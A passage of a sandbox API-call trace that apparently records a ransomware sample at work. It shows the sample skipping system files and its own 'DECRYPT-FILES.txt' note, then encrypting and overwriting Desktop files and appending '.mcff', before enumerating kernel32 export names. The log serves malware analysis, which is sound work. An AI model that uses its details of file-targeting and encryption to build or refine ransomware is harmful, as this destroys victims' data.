returned="EnumDateFormatsW" [0082.833] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.833] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\127zrfgdW9q5BqzyAa.png") returned 60 [0082.833] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\127zrfgdW9q5BqzyAa.png.mcff") returned 65 [0082.833] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\127zrfgdW9q5BqzyAa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\127zrfgdw9q5bqzyaa.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\127zrfgdW9q5BqzyAa.png.mcff" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\127zrfgdw9q5bqzyaa.png.mcff"), dwFlags=0x0) returned 1 [0082.834] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.834] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.834] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.834] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aebda70, ftCreationTime.dwHighDateTime=0x1d4c83f, ftLastAccessTime.dwLowDateTime=0xa8bdcac0, ftLastAccessTime.dwHighDateTime=0x1d4c590, ftLastWriteTime.dwLowDateTime=0xa8bdcac0, ftLastWriteTime.dwHighDateTime=0x1d4c590, nFileSizeHigh=0x0, nFileSizeLow=0xf154, dwReserved0=0x0, dwReserved1=0x0, cFileName="17tvF0H1H-L.mkv", cAlternateFileName="17TVF0~1.MKV")) returned 1 [0082.834] lstrcmpiW (lpString1="17tvF0H1H-L.mkv", lpString2="DECRYPT-FILES.txt") returned -1 [0082.834] lstrcmpiW (lpString1="17tvF0H1H-L.mkv", lpString2="autorun.inf") returned -1 [0082.834] lstrcmpiW (lpString1="17tvF0H1H-L.mkv", lpString2="boot.ini") returned -1 [0082.834] lstrcmpiW (lpString1="17tvF0H1H-L.mkv", lpString2="desktop.ini") returned -1 [0082.834] lstrcmpiW (lpString1="17tvF0H1H-L.mkv", lpString2="ntuser.dat") returned -1 [0082.835] lstrcmpiW (lpString1="17tvF0H1H-L.mkv", lpString2="iconcache.db") returned -1 [0082.835] lstrcmpiW (lpString1="17tvF0H1H-L.mkv", lpString2="bootsect.bak") returned -1 [0082.835] lstrcmpiW (lpString1="17tvF0H1H-L.mkv", lpString2="ntuser.dat.log") returned -1 [0082.835] lstrcmpiW (lpString1="17tvF0H1H-L.mkv", lpString2="thumbs.db") returned -1 [0082.835] lstrcmpiW (lpString1="17tvF0H1H-L.mkv", lpString2="Bootfont.bin") returned -1 [0082.835] lstrlenW (lpString="17tvF0H1H-L.mkv") returned 15 [0082.835] lstrcmpiW (lpString1="mkv", lpString2="lnk") returned 1 [0082.835] lstrcmpiW (lpString1="mkv", lpString2="exe") returned 1 [0082.835] lstrcmpiW (lpString1="mkv", lpString2="sys") returned -1 [0082.835] lstrcmpiW (lpString1="mkv", lpString2="dll") returned 1 [0082.835] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0082.835] lstrlenW (lpString="17tvF0H1H-L.mkv") returned 15 [0082.835] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0082.835] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="17tvF0H1H-L.mkv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\17tvF0H1H-L.mkv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\17tvF0H1H-L.mkv" [0082.835] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\17tvF0H1H-L.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\17tvf0h1h-l.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0082.835] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=61780) returned 1 [0082.835] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0082.835] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.836] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.836] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.836] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.836] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0082.836] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.837] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.837] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.838] CloseHandle (hObject=0x43c) returned 1 [0082.838] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.838] WriteFile (in: hFile=0x438, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0082.839] CloseHandle (hObject=0x0) returned 0 [0082.839] CloseHandle (hObject=0x438) returned 1 [0082.840] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.840] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.840] GetTickCount () returned 0x114d2e9 [0082.840] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.840] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.840] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.841] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.841] lstrlenA (lpString="kernel32.dll") returned 12 [0082.841] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.841] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.841] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.841] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.841] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.841] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.841] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.841] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.841] lstrlenA (lpString="ADDATOMA") returned 8 [0082.841] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.841] lstrlenA (lpString="ADDATOMW") returned 8 [0082.841] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.841] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.841] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.841] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.841] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.841] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.841] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.841] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.841] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.841] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.841] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.842] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.842] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.842] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.842] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.842] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.842] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.842] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.842] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.842] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.842] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.842] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.842] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.842] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.842] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.842] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.842] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.842] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.842] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.842] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.843] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.843] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.843] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.843] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.843] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.843] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.843] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.843] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.843] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.843] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.843] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.843] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.843] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.843] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.843] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.843] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.843] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.843] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.843] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.843] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.844] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.844] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.844] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.844] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.844] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.844] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.844] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.844] lstrlenA (lpString="BEEP") returned 4 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.844] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.844] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.844] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.844] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.844] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.844] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.844] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.844] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.844] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.844] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.844] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.845] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.845] lstrlenA (lpString="CANCELIO") returned 8 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.845] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.845] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.845] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.845] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.845] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.845] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.845] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.845] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.845] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.845] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.845] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.845] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.845] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.845] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.845] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.845] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.846] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.846] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.846] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.846] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.846] lstrlenA 